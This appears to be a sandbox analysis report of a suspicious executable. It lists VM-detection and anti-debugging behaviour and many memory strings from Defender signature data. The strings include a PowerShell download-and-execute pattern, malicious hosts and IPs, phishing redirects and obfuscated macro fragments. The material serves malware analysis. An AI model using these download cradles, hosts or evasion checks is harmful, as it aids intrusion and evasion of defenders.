Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 0000000B.00000003.18321478947.0000021B5F112000.00000004.00000001.sdmp Binary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-aarch64.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vhds.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-armel.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information queried: ProcessInformation
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AB030 FindNextFileW,FindClose,FindFirstFileW, 18_2_00007FF7E30AB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30AADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D2504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30D2504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 18_2_00007FF7E305F810
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Thread information set: HideFromDebugger
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C3425 mov eax, dword ptr fs:[00000030h] 6_2_022C3425
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C1B55 mov eax, dword ptr fs:[00000030h] 6_2_022C1B55
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C0F9D mov eax, dword ptr fs:[00000030h] 6_2_022C0F9D
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B3BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30B3BFC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B0B50 GetProcessHeap,HeapFree, 18_2_00007FF7E30B0B50
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CB798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF7E30CB798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B3BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30B3BFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CBF4C SetUnhandledExceptionFilter, 18_2_00007FF7E30CBF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CBD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF7E30CBD68

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe'
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ($.7c-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s5h3n9
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: snpy(\(i
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k!711~
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: i"lpy8\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ji*e@;
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '[z5wj
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: z9`d6
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: /q<4o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 2;||7
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: e_ju4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: y&yxqc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \(5,_!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b'cp/p
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ?.>7r
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k~]pdzjso
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 'p2_s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: rxhgruyd
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &`\li
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k~[rm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [vywx?z
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: defxj
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: sl=v:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: +*<~s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #fkk(3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \@|ux"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: gxctu
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b&m;]
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: pbg,l
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tpx;@=z
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (-?s84
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `ln"m
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `ln"mm(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: /<|rx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: an['y
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: mbli_g3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ep]m|
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: g{~</ba
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b':'0
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dp|7^
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ]9;xo`
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *'^ha
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: >hs;v1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: j.r` i
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 'wnf/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ove7b
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: w.;ggq
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nnu[%u
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: kq?"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "](e`tz
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b@sc6
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x}hs`\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &jk2f
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: oaiub
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,fn$|
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ba(p4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [:hmw
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: }p[@&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: bd~o4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n?5n`
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s2!d2t
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $.ajax({url:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [$.ajax({url:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,type:"post",datatype:"html",data:{email:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,password:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,typeofemail:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#script:powershell/iexdownloadip
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [iex(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: new-objectnet.webclient).downloadstring(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:bat/cryptrepldow.ad2!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:win32/downloader.pk4!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !tart""%windir%\sys!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [!tart""%windir%\sys!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !em32\cm!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !p.exe/s"!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !"!%systemroot%\system32\ieframe.dll
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !!#trojan:win32/downloader.pk5!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !"!%systemroot%\system32\shell32.dll
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#scpt:trojan:html/phish.pyhj1!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: window.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zwindow.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#script:pws:html/phish_paypalmsg1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: paypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zpaypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "!#tel:scpt:trojan:win32/kovter!lnk
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: z\appdata\local\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .bat.\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #!#script:html/techbrolo.g!alertfunc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: <scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: y<scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ")},2e3)</script>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#scpt:browsermodifier:win32/veenine
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: iexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xiexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z&from=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z&uid=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )&ts=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: xldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#scpt:o97m/cve-2017-11882.rxrop!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: >6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x>6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $!#trojandownloader:vbs/powdown.d!ms1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: wtarget="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandownloader:o97m/silkie.c!pra3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: weregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandownloader:o97m/slikie.a3!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd/c@echooff&pi^n^g98-n3&echo|s^et/p=""
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: weexec("cmd/c@echooff&pi^n^g98-n3&echo|s^et/p=""
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: %!#trojandropper:bat/malvbsdrper.c!vc2
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: @echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: w@echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )&setlocaldisabledelayedexpansion&for/f"delims=:.tokens
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v<?xmlversion=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "target="http://185.172.110.217/kvsn/image.png"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v<?xmlversion
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://outfish.bounceme.net/outl.dot"targetmode="external"/>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://theenterpriseholdings.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "targetmode="external"/>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:browsermodifier:win32/sweetpage
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: iexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: viexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:trojandownloader:vbs/qakbot.su1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =replace("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v=replace("
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ing","
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ","")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#scpt:worm:vbs/jenxcus!cryptrepchrrev
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v=replace(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ,chrw(
